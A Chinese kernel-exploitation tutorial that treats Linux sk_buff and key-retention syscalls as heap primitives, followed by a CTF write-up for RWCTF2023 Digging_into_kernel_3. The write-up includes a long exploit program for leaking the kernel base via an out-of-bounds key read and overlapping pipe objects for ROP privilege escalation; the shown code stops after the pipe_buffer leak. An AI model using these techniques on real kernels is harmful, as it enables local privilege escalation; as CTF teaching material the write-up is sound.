fclones = container_of(skb, struct sk_buff_fclones, skb2);
break;
}
if (!refcount_dec_and_test(&fclones->fclone_ref))
return;
fastpath:
kmem_cache_free(skbuff_fclone_cache, fclones);
}

从这里我们也可以看出 sk_buff 结构体也为我们提供了一个简陋的“菜单堆”功能,比较朴素的利用方式就是利用 socketpair 系统调用创建一对套接字,往其中一端写入以完成发包,从另一端读出以完成收包。

内核密钥管理:内核中的“菜单堆”

自 Linux 2.6 起内核引入了密钥保留服务(key retention service),用以在内核空间存储密钥以供其他服务使用,并提供了用以在用户空间操作密钥的三个新的系统调用(add_key、request_key 与 keyctl),我们这里仅关注 type 为 "user" 的密钥

add_key - 创建带描述密钥(GFP_KERNEL | __GFP_HARDWALL | __GFP_NOWARN)

add_key() 系统调用用以创建或更新带有给定 type 和 description 的密钥,并以长为 plen 的 payload 将其实例化,之后将其挂到指定的 keyring 上并返回一个代表密钥的序列号:

1
2
3
4
5
6
#include <sys/types.h>
#include <keyutils.h>

key_serial_t add_key(const char *type, const char *description,
const void *payload, size_t plen,
key_serial_t keyring);

这里我们主要关注这个功能如何被利用在 kernel pwn 当中,这里先给 pwner 视角下该函数的简要流程:

  • 首先会在内核空间中分配 obj1 与 obj2,分配 flag 为 GFP_KERNEL,用以保存 description (字符串,最大大小为 4096)、payload (普通数据,大小无限制)
  • 分配 obj3 保存 description ,分配 obj4 保存 payload,分配 flag 皆为 GFP_KERNEL
  • 释放 obj1 与 obj2,返回密钥 id

现在我们来看具体过程,在 add_key() 系统调用中其会为 description 和 payload 都分配对应大小的对象,并将数据拷贝到内核空间当中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
SYSCALL_DEFINE5(add_key, const char __user *, _type,
const char __user *, _description,
const void __user *, _payload,
size_t, plen,
key_serial_t, ringid)
{
...
if (_description) {
// 为 decription 分配对象并将数据拷贝到内核空间当中
description = strndup_user(_description, KEY_MAX_DESC_SIZE);
...
}
...
if (plen) {
ret = -ENOMEM;
// 为 payload 分配对象
payload = kvmalloc(plen, GFP_KERNEL);
if (!payload)
goto error2;

ret = -EFAULT;
// 将 payload 数据拷贝到内核空间当中
if (copy_from_user(payload, _payload, plen) != 0)
goto error3;
}
// 再次为 decription 和 payload 分配对象
key_ref = key_create_or_update(keyring_ref, type, description,
payload, plen, KEY_PERM_UNDEF,
KEY_ALLOC_IN_QUOTA);
...
error3:
if (payload) {
memzero_explicit(payload, plen);
// 释放第一次分配的 payload
kvfree(payload);
}
error2:
// 释放第一次分配的 description
kfree(description);
error:
return ret;
}

提示

这个函数的真实名称是 __x64_sys_add_key ,我们在调试的时候应该按照这个真实名称下断点。

拷贝 description 使用的是 strndup_user() ,可以看作 kmalloc() + strcpy() 的结合体,并限制了最大长度为 KEY_MAX_DESC_SIZE(4096),其核心是使用 memdup_user() 进行对象的分配与拷贝,使用的分配 flag 为 GFP_USER | __GFP_NOWARN,而 GFP_USER 其实等价于 GFP_KERNEL | __GFP_HARDWALL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void *memdup_user(const void __user *src, size_t len)
{
void *p;

p = kmalloc_track_caller(len, GFP_USER | __GFP_NOWARN);
if (!p)
return ERR_PTR(-ENOMEM);

if (copy_from_user(p, src, len)) {
kfree(p);
return ERR_PTR(-EFAULT);
}

return p;
}
EXPORT_SYMBOL(memdup_user);

而 payload 的拷贝则更简单,直接使用 kvmalloc(plen, GFP_KERNEL) 分配 plen 大小的对象后使用 copy_from_user() 进行拷贝。

不过这两个对象都为临时对象,类似于 setxattr ,在 add_key() 系统调用结束时这两个用来存储数据的临时对象便会被释放掉。

但是实际上在 add_key() 调用的 key_create_or_update() 中还会进行第二次对象分配。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
key_ref_t key_create_or_update(key_ref_t keyring_ref,
const char *type,
const char *description,
const void *payload,
size_t plen,
key_perm_t perm,
unsigned long flags)
{
struct keyring_index_key index_key = {
.description = description,
};
struct key_preparsed_payload prep;
...
memset(&prep, 0, sizeof(prep));
prep.data = payload;
prep.datalen = plen;
prep.quotalen = index_key.type->def_datalen;
prep.expiry = TIME64_MAX;
if (index_key.type->preparse) {
// 再次为 payload 分配对象
ret = index_key.type->preparse(&prep);
...
}
...
// 为 key 分配对象并再次为 description 分配对象
key = key_alloc(index_key.type, index_key.description,
cred->fsuid, cred->fsgid, cred, perm, flags, NULL);
...
// user_key_payload 存储到 key
ret = __key_instantiate_and_link(key, &prep, keyring, NULL, &edit);
}

注意

这里会按 description 进行去重,也就是说如果我们申请了两个 description 相同的 key,则后一次申请会更新已有的 key,并导致其原先的 payload 被释放。

这里的 index_key.type 根据我们传进来的 type 参数决定,对于 "user" 而言该函数表应当为 key_type_user

1
2
3
4
5
6
7
8
9
10
11
struct key_type key_type_user = {
.name = "user",
.preparse = user_preparse,
.free_preparse = user_free_preparse,
.instantiate = generic_key_instantiate,
.update = user_update,
.revoke = user_revoke,
.destroy = user_destroy,
.describe = user_describe,
.read = user_read,
};

因此被调用的函数为 user_preparse ,其会为我们的 payload 再分配一个带有一个 user_key_payload 结构体作为头部的对象来保存我们传入的 payload ,分配 flag 为 GFP_KERNEL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}

user_key_payload 的定义如下:

1
2
3
4
5
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

其中 rcu_head 的定义如下,即 user_key_payload 带有一个长度为 0x18 的 header:

1
2
3
4
5
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

key_alloc() 当中存在如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct key *key_alloc(struct key_type *type, const char *desc,
kuid_t uid, kgid_t gid, const struct cred *cred,
key_perm_t perm, unsigned long flags,
struct key_restriction *restrict_link)
{
//...

desclen = strlen(desc);
quotalen = desclen + 1 + type->def_datalen;

//...

/* allocate and initialise the key and its description */
key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
if (!key)
goto no_memory_2;

key->index_key.desc_len = desclen;
key->index_key.description = kmemdup(desc, desclen + 1, GFP_KERNEL);

在该函数中会完成代表单个密钥的 key 结构体与 description 空间的分配,其中 key 结构体来自独立的 key_jar,这里我们暂且不关注,而 description 的空间则使用 kmemdup() 进行分配,该函数本质上等于 slab_alloc_node() + memcpy(),可以直接理解为使用 kmalloc(size, GFP_KERNEL) 分配了一个内核对象并写入了一个字符串 description

后存在如下调用链将 user_key_payload 存储到 key 中:

1
2
3
4
sys_add_key()
key_create_or_update()
__key_instantiate_and_link()
key->type->instantiate(key, prep) // 对于 type "user" 而言为 generic_key_instantiate()

数据泄露

  • 内核 .text 段地址

    user_key_payload 的 header 中带有一个函数指针,对于 type 为 "user" 的 key 而言在 payload 被释放时该指针会被赋值 user_free_payload_rcu(),因此我们可以通过释放掉一段 payload 后再通过其他方法读取 payload 内容的方式(例如通过其他的 payload 进行越界读取)来泄露内核 .text 段地址

    但是有的版本内核的 user_key_payload 释放前会清空内存导致无法泄露内核基址。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    static inline void memzero_explicit(void *s, size_t count)
    {
    memset(s, 0, count);
    barrier_data(s);
    }


    void kfree_sensitive(const void *p)
    {
    size_t ks;
    void *mem = (void *)p;

    ks = ksize(mem);
    if (ks)
    memzero_explicit(mem, ks);
    kfree(mem);
    }
  • 内核“堆”上地址

    通过 header 中的 next 指针泄露

keyctl - 密钥管理:“菜单堆”操作

keyctl() 系统调用为我们提供了对内核中密钥的管理,其核心主要是一个巨大的 switch,类似于 ioctl,根据我们传入的不同的 option 进行不同的操作,我们主要关注以下几个:

KEYCTL_REVOKE - 释放 payload

该选项对应调用的是 keyctl_revoke_key(),其中会调用到 key_revoke(),其中会调用 key->type->revoke(key),对于 type 为 "user" 的 key 而言最后调用到 user_revoke()

1
2
3
4
5
6
7
8
9
10
11
12
void user_revoke(struct key *key)
{
struct user_key_payload *upayload = user_key_payload_locked(key);

/* clear the quota */
key_payload_reserve(key, 0);

if (upayload) {
rcu_assign_keypointer(key, NULL);
call_rcu(&upayload->rcu, user_free_payload_rcu);
}
}

这里会通过 call_rcu() 调用到 user_free_payload_rcu(),将 payload 释放掉:

1
2
3
4
5
6
7
static void user_free_payload_rcu(struct rcu_head *head)
{
struct user_key_payload *payload;

payload = container_of(head, struct user_key_payload, rcu);
kfree_sensitive(payload);
}

KEYCTL_UPDATE - 更新 payload 内容

该选项会调用到 keyctl_update_key(),首先会分配一个临时对象从用户空间拷贝数据,之后调用 key_update() 更新 payload,最后释放掉临时对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
long keyctl_update_key(key_serial_t id,
const void __user *_payload,
size_t plen)
{
key_ref_t key_ref;
void *payload;
long ret;

ret = -EINVAL;
if (plen > PAGE_SIZE)
goto error;

/* pull the payload in if one was supplied */
payload = NULL;
if (plen) {
ret = -ENOMEM;
payload = kvmalloc(plen, GFP_KERNEL);
if (!payload)
goto error;

ret = -EFAULT;
if (copy_from_user(payload, _payload, plen) != 0)
goto error2;
}

/* find the target key (which must be writable) */
key_ref = lookup_user_key(id, 0, KEY_NEED_WRITE);
if (IS_ERR(key_ref)) {
ret = PTR_ERR(key_ref);
goto error2;
}

/* update the key */
ret = key_update(key_ref, payload, plen);

key_ref_put(key_ref);
error2:
kvfree_sensitive(payload, plen);
error:
return ret;
}

key_update() 中会调用 key->type->preparse(&prep) 分配新 payload 空间并进行数据拷贝,之后调用 key->type->update(key, &prep) 更新 payload 并释放旧的 payload ,最后调用 key->type->free_preparse(&prep) 来了一个“假动作”。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
 * Excerpt of key_update(); omitted parts are marked "//...".
 * Wraps the caller's buffer in a key_preparsed_payload, runs the key type's
 * preparse hook when one exists, calls the type's update hook, and then calls
 * free_preparse on the prepared payload.
 */
int key_update(key_ref_t key_ref, const void *payload, size_t plen)
{
//...

memset(&prep, 0, sizeof(prep));
prep.data = payload;
prep.datalen = plen;
prep.quotalen = key->type->def_datalen;
prep.expiry = TIME64_MAX;
if (key->type->preparse) {
ret = key->type->preparse(&prep);

//...

ret = key->type->update(key, &prep);

//...

/* free_preparse is only invoked for types that also provide preparse */
if (key->type->preparse)
key->type->free_preparse(&prep);
return ret;
}

对于 type 为 "user" 而言 preparse 指针应当为 user_preparse,这个函数前面分析过,其会为我们的 payload 再分配一个带有一个 user_key_payload 结构体作为头部的对象来保存我们传入的 payload ,分配 flag 为 GFP_KERNEL

对于 type 为 "user" 而言 update 指针应当为 user_update,主要就是将新的 payload 给到 key,调用 user_free_payload_rcu() 释放旧的 payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/*
 * Update hook for "user" keys: reserve quota for the new data length, install
 * the prepared payload on the key, and queue the displaced payload (if any)
 * for freeing through call_rcu(). Returns the key_payload_reserve() result.
 */
int user_update(struct key *key, struct key_preparsed_payload *prep)
{
struct user_key_payload *zap = NULL;
int ret;

/* check the quota and attach the new data */
ret = key_payload_reserve(key, prep->datalen);
if (ret < 0)
return ret;

/* attach the new data, displacing the old */
key->expiry = prep->expiry;
if (key_is_positive(key))
zap = dereference_key_locked(key);
rcu_assign_keypointer(key, prep->payload.data[0]);
/* the key now holds the new payload; clear the slot so prep no longer refers to it */
prep->payload.data[0] = NULL;

if (zap)
call_rcu(&zap->rcu, user_free_payload_rcu);
return ret;
}

对于 type 为 "user" 而言 free_preparse 指针应当为 user_free_preparse,这里只是一个简单的释放操作,但传入的参数 prep->payload.data[0] 在 user_update 中已经被设为 NULL,所以这一步并没有实际作用。

1
2
3
4
5
6
7
/*
* Free a preparse of a user defined key payload
*
* Releases whatever prep->payload.data[0] still points to with
* kfree_sensitive().
*/
void user_free_preparse(struct key_preparsed_payload *prep)
{
kfree_sensitive(prep->payload.data[0]);
}

KEYCTL_READ - 读取 payload 内容

该选项对应调用的是 keyctl_read_key(),首先会先分配一个临时对象,之后调用 __keyctl_read_key() 将 payload 拷贝到临时对象上,最后从临时对象上拷贝数据到用户空间后释放该临时对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/*
 * Excerpt of keyctl_read_key(); omitted parts are marked "//...".
 * Reads the key into a temporary kernel buffer through __keyctl_read_key()
 * and then copies that buffer to user space. The temporary buffer is released
 * with kvfree_sensitive().
 */
long keyctl_read_key(key_serial_t keyid, char __user *buffer, size_t buflen)
{
//...

/* start with the caller's length when it fits in a page, otherwise with no buffer */
key_data_len = (buflen <= PAGE_SIZE) ? buflen : 0;
for (;;) {
if (key_data_len) {
key_data = kvmalloc(key_data_len, GFP_KERNEL);
if (!key_data) {
ret = -ENOMEM;
goto key_put_out;
}
}

ret = __keyctl_read_key(key, key_data, key_data_len);

//...

/* the read reported more data than the temporary buffer holds: drop the buffer and retry with the reported length */
if (ret > key_data_len) {
if (unlikely(key_data))
kvfree_sensitive(key_data, key_data_len);
key_data_len = ret;
continue; /* Allocate buffer */
}

if (copy_to_user(buffer, key_data, ret))
ret = -EFAULT;
}
kvfree_sensitive(key_data, key_data_len);
//...

__keyctl_read_key() 的主要逻辑便是调用 key->type->read(key, buffer, buflen);,对于 type 为 "user" 而言应当为 user_read(),本质上就是一个 memcpy()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Read hook for "user" keys. Copies at most upayload->datalen bytes of the
 * payload into buffer and always returns upayload->datalen, even when the
 * supplied buffer is shorter or absent.
 */
long user_read(const struct key *key, char *buffer, size_t buflen)
{
const struct user_key_payload *upayload;
long ret;

upayload = user_key_payload_locked(key);
ret = upayload->datalen;

/* we can return the data as is */
if (buffer && buflen > 0) {
/* the copy length is bounded only by the datalen stored in the payload header */
if (buflen > upayload->datalen)
buflen = upayload->datalen;

memcpy(buffer, upayload->data, buflen);
}

return ret;
}

数据泄露

这里我们可以注意到其拷贝的数据长度限制为 payload->datalen,如果我们能够用某种方式更改 payload 头部的 datalen 为一个更大值,便能完成内核空间中的越界读取,同时由于其使用先分配一个 buflen/datalen 长度的临时对象进行数据拷贝后再将临时对象上数据拷贝到用户空间的方式,因此不会触发 hardened usercopy 的检查(需要看具体版本实现)。

KEYCTL_UNLINK 选项对应调用的是 keyctl_keyring_unlink() ,其最后会调用到 key_unlink() 进行资源的释放:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Remove the link to key from keyring. Takes the unlink lock, prepares the
 * edit with __key_unlink_begin(), applies it only when preparation returned 0,
 * and always finishes with __key_unlink_end(). Returns the lock error or the
 * __key_unlink_begin() result.
 */
int key_unlink(struct key *keyring, struct key *key)
{
struct assoc_array_edit *edit = NULL;
int ret;

key_check(keyring);
key_check(key);

ret = __key_unlink_lock(keyring);
if (ret < 0)
return ret;

ret = __key_unlink_begin(keyring, key, &edit);
if (ret == 0)
__key_unlink(keyring, key, &edit);
__key_unlink_end(keyring, key, edit);
return ret;
}

例题:RWCTF2023体验赛-Digging_into_kernel_3

附件下载链接

有一个无限的 free 功能和一个 kmalloc + 写 的功能。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* Decompiled fragment of the challenge driver's ioctl handler. */
/* Command 0xC0DECAFE: free the object held in slot input.index (0 or 1). */
if ( a2 == 0xC0DECAFE )
{
if ( !copy_from_user(&input, a3, 16LL) && input.index <= 1u )
/* buf[input.index] is not cleared afterwards, so the slot keeps the freed pointer */
kfree(buf[input.index]);
return 0LL;
}
v3 = -1LL;
/* Command 0xDEADBEEF: allocate input.size bytes into the slot and fill them from user memory. */
if ( a2 == 0xDEADBEEF )
{
if ( copy_from_user(&input, a3, 16LL) )
return 0LL;
index = (unsigned int)input.index;
if ( input.index > 1u )
return 0LL;
/* the allocation size comes straight from the request; 0xDC0 is the flags argument */
buf[index] = _kmalloc((unsigned int)input.size, 0xDC0LL);
v6 = buf[input.index];
if ( !v6 )
return 0LL;
if ( (unsigned int)input.size > 0x7FFFFFFFuLL )
BUG();
if ( copy_from_user(v6, input.buf, (unsigned int)input.size) )
return 0LL;
}

由于 key 的 description 限制大,因此我们只使用它的 payload 部分。并且为了避免 description 对利用造成影响,整个利用过程中 description 大小不能和相关的 object 有交集。

首先堆风水申请两个相邻的 user_key_payload ,然后改大前一个 user_key_payload 的 datalen 并释放后一个 user_key_payload 。由于 user_key_payload.rcu.func 在释放时会写入内核地址,因此我们可以越界读前一个 user_key_payload 泄露内核地址。

之后我们使用 pipe_inode_info + pipe_buffer 劫持程序流实现提权。

首先我们堆风水使得一个我们可控的 pipe_inode_info 大小的 object 被 user_key_payload 使用。然后释放这个 object 以及一个 pipe_buffer 大小的 object。

创建一个 pipe 使得这两个 object 分别被 pipe_inode_info 和 pipe_buffer 使用,此时我们可以通过读取 user_key_payload 获取 pipe_buffer 的地址。这里由于 user_key_payload 的 datalen 被 pipe_inode_info 改为了 0xFFFF ,因此我们需要让 key_read 传入的 buflen 足够长才能读取出数据。

之后在劫持的 pipe_buffer 上伪造 pipe_buf_operations 并且写入 rop 提权。这里我们用到的 gadget 如下:

1
2
3
4
5
6
7
8
9
10
11
.text:FFFFFFFF81250C9D push    rsi
.text:FFFFFFFF81250C9E pop rsp
.text:FFFFFFFF81250C9F cmp rcx, rdx
.text:FFFFFFFF81250CA2 jb short loc_FFFFFFFF81250C85
.text:FFFFFFFF81250CA4 pop rbx
.text:FFFFFFFF81250CA5 xor eax, eax
.text:FFFFFFFF81250CA7 pop rbp
.text:FFFFFFFF81250CA8 pop r12
.text:FFFFFFFF81250CAA jmp __x86_return_thunk
...
.text:FFFFFFFF82003240 retn
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include<ctype.h>

/*
 * Pin the calling process to a single CPU.
 *
 * core: index of the CPU to run on.
 *
 * A failure to set the affinity is reported on stderr; execution continues,
 * as it did before the check was added.
 */
void bind_core(int core) {
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(core, &mask);
    if (sched_setaffinity(getpid(), sizeof(mask), &mask) != 0) {
        perror("[-] sched_setaffinity");
    }
}

/*
 * Hex-dump a buffer as rows of four 64-bit words followed by an ASCII column.
 *
 * desc: optional title printed before the dump (NULL to omit).
 * addr: start of the buffer.
 * len:  buffer length in bytes; only whole 8-byte words are printed in the
 *       hex columns.
 *
 * Missing words on the last row are padded to the full column width so the
 * ASCII column stays aligned.
 */
void qword_dump(char *desc, void *addr, int len) {
    const uint64_t *qwords = (const uint64_t *) addr;
    const uint8_t *bytes = (const uint8_t *) addr;
    const int nqwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int row = 0; row < nqwords; row += 4) {
        printf(" %04x", row * 8);
        for (int col = 0; col < 4; col++) {
            if (row + col < nqwords) {
                /* cast so the conversion matches on every ABI, not only where uint64_t is unsigned long */
                printf(" 0x%016llx", (unsigned long long) qwords[row + col]);
            } else {
                /* same width as one " 0x%016llx" column */
                printf("%19s", "");
            }
        }
        printf(" ");
        for (int off = 0; off < 32 && off + row * 8 < len; off++) {
            uint8_t ch = bytes[row * 8 + off];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/* Print the flag file and then start /bin/sh; main() installs this as the SIGSEGV handler. */
void get_shell() { system("cat flag;/bin/sh"); }

size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Record the current user-mode cs, ss, rsp and rflags in the user_* globals.
 * main() later places these values at the end of its ROP chain.
 * NOTE(review): the operand order (destination first) looks like Intel
 * syntax, so this presumably needs -masm=intel -- confirm the build flags.
 */
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

/* Userland copy of the callback head embedded in user_key_payload (aliased to rcu_head below). */
struct callback_head {
struct callback_head *next;

/* callback pointer; main() reads this slot out of a revoked key to compute kernel_offset */
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

#define rcu_head callback_head
#define __aligned(x) __attribute__((__aligned__(x)))
typedef unsigned long long u64;

/*
 * Userland copy of the payload header used by "user" keys. It is used here to
 * compute the header size and to lay out a forged header (datalen) in a
 * buffer.
 */
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[0] __aligned(__alignof__(u64)); /* actual data */
};

/*
 * Create a "user" key in the process keyring.
 *
 * description: NUL-terminated key description.
 * payload:     data to store in the key.
 * payload_len: number of payload bytes.
 *
 * Returns the new key's serial number, or -1 with errno set.
 */
int key_alloc(void *description, void *payload, int payload_len) {
    /* syscall() is variadic and the kernel reads this argument as a size_t,
     * so widen it explicitly instead of passing a bare int. */
    size_t plen = (size_t) payload_len;

    return syscall(__NR_add_key, "user", description, payload, plen, KEY_SPEC_PROCESS_KEYRING);
}

/* Thin wrapper for keyctl(KEYCTL_UPDATE): replace the payload of key keyid with plen bytes from payload. */
int key_update(int keyid, void *payload, size_t plen) {
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

/* Thin wrapper for keyctl(KEYCTL_READ): read key keyid into buffer (capacity buflen) and return the syscall result. */
int key_read(int keyid, void *buffer, size_t buflen) {
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

/* Thin wrapper for keyctl(KEYCTL_REVOKE) on key keyid. */
int key_revoke(int keyid) {
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

/* Thin wrapper for keyctl(KEYCTL_UNLINK): unlink key keyid from the process keyring. */
int key_unlink(int keyid) {
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/*
 * Userland copy of the kernel's pipe_buffer layout; main() uses it to place a
 * forged ops pointer at the right offset inside a buffer.
 * Reads start from len to offset, writes start from offset.
 */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

/*
 * Userland copy of the pipe buffer operations table. Only the position of
 * each hook matters here: main() writes a forged release pointer through this
 * layout.
 */
struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

/* Request structure passed to the challenge driver's ioctl by alloc() and delete(). */
struct node {
u_int32_t index; /* slot number */
u_int32_t size; /* allocation size in bytes */
void *buf; /* user buffer to copy from */
};

int rwctf_fd;

/* Issue ioctl 0xDEADBEEF on rwctf_fd with {index, size, buf}; the ioctl result is not checked. */
void alloc(u_int32_t index, u_int32_t size, void *buf) {
ioctl(rwctf_fd, 0xDEADBEEF, &(struct node) {index, size, buf});
}

/* Issue ioctl 0xC0DECAFE on rwctf_fd for slot index; the ioctl result is not checked. */
void delete(u_int32_t index) {
ioctl(rwctf_fd, 0xC0DECAFE, &(struct node) {.index=index});
}


/* Allocation sizes passed to alloc() in main() for each kind of object. */
#define PIPE_INODE_INFO_SIZE 192
#define PIPE_BUFFER_SIZE 1024
#define USER_KEY_PAYLOAD_SIZE 0x40

/* Addresses for one specific kernel image; main() adds kernel_offset to each before use. */
size_t push_rsi_pop_rsp_pop_rbx_pop_rbp_pop_r12_ret = 0xffffffff81250c9d;
size_t pop_rdi_ret = 0xffffffff8106ab4d;
size_t init_cred = 0xFFFFFFFF82850580;
size_t commit_creds = 0xFFFFFFFF81095C30;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81E00ED0;


/*
 * Walkthrough program for the RWCTF2023 Digging_into_kernel_3 challenge
 * driver (/dev/rwctf). The steps follow the write-up: leak a kernel address
 * through an enlarged user_key_payload, then overlap a key with the pipe
 * objects and replace the pipe_buffer contents.
 *
 * Diagnostics use conversions that match their argument types (the previous
 * "%p" with int/size_t arguments was undefined behavior), and mmap()/pipe()
 * failures are reported instead of being ignored.
 */
int main() {
    bind_core(0);
    save_status();
    rwctf_fd = open("/dev/rwctf", O_RDWR);
    if (rwctf_fd < 0) {
        puts("[-] Failed to open rwctf.");
        exit(-1);
    }

    size_t *buf = (size_t *) mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) {
        perror("[-] mmap");
        exit(-1);
    }
    memset(buf, 0, 0x4000);

    /* Step 1: two driver objects of the payload size are allocated and freed,
     * then two keys with the same total size are created. */
    alloc(0, USER_KEY_PAYLOAD_SIZE, buf);
    alloc(1, USER_KEY_PAYLOAD_SIZE, buf);
    delete(1);
    delete(0);

    size_t key_payload_data_size = USER_KEY_PAYLOAD_SIZE - sizeof(struct user_key_payload);
    memset(buf, 'a', key_payload_data_size);
    int key_id0 = key_alloc("0", buf, key_payload_data_size);
    memset(buf, 'b', key_payload_data_size);
    int key_id1 = key_alloc("1", buf, key_payload_data_size);

    /* Step 2: free slot 1 again and re-allocate through the driver with a
     * forged header whose datalen also covers the following object. */
    delete(1);
    memset(((struct user_key_payload *) buf)->data, 'c', key_payload_data_size);
    size_t key_payload_oob_size = key_payload_data_size + USER_KEY_PAYLOAD_SIZE;
    ((struct user_key_payload *) buf)->datalen = key_payload_oob_size;
    alloc(0, USER_KEY_PAYLOAD_SIZE, buf);

    /* Step 3: revoke the second key and read the first; buf[6] is used as the leaked pointer. */
    key_revoke(key_id1);
    printf("[*] key read length: %d\n", key_read(key_id0, buf, key_payload_oob_size));
    qword_dump("leak kernel address from user_key_payload.rcu.head", buf, key_payload_oob_size);
    size_t kernel_offset = buf[6] - 0xffffffff813d8210;
    printf("[+] kernel offset: %#zx\n", kernel_offset);

    push_rsi_pop_rsp_pop_rbx_pop_rbp_pop_r12_ret += kernel_offset;
    pop_rdi_ret += kernel_offset;
    init_cred += kernel_offset;
    commit_creds += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode += kernel_offset;


    /* Step 4: same pattern for the pipe-sized objects. */
    alloc(0, PIPE_INODE_INFO_SIZE, buf);
    alloc(1, PIPE_INODE_INFO_SIZE, buf);
    delete(1);
    delete(0);

    int pipe_key_id = key_alloc("pipe", buf, PIPE_INODE_INFO_SIZE - sizeof(struct user_key_payload));
    delete(1);// pipe_inode_info pipe_key_id
    alloc(0, PIPE_BUFFER_SIZE, buf);
    delete(0);// pipe_buffer

    int pipe_fd[2];
    if (pipe(pipe_fd) < 0) {
        perror("[-] pipe");
        exit(-1);
    }
    key_payload_data_size = PIPE_INODE_INFO_SIZE - sizeof(struct user_key_payload);
    printf("[*] key read length: %d\n", key_read(pipe_key_id, buf, -1));
    qword_dump("get pip_buffer addr from pipe_inode_info", buf, key_payload_data_size);

    size_t pipe_buffer_addr = buf[16];
    printf("[+] pipe_buf addr: %#zx\n", pipe_buffer_addr);
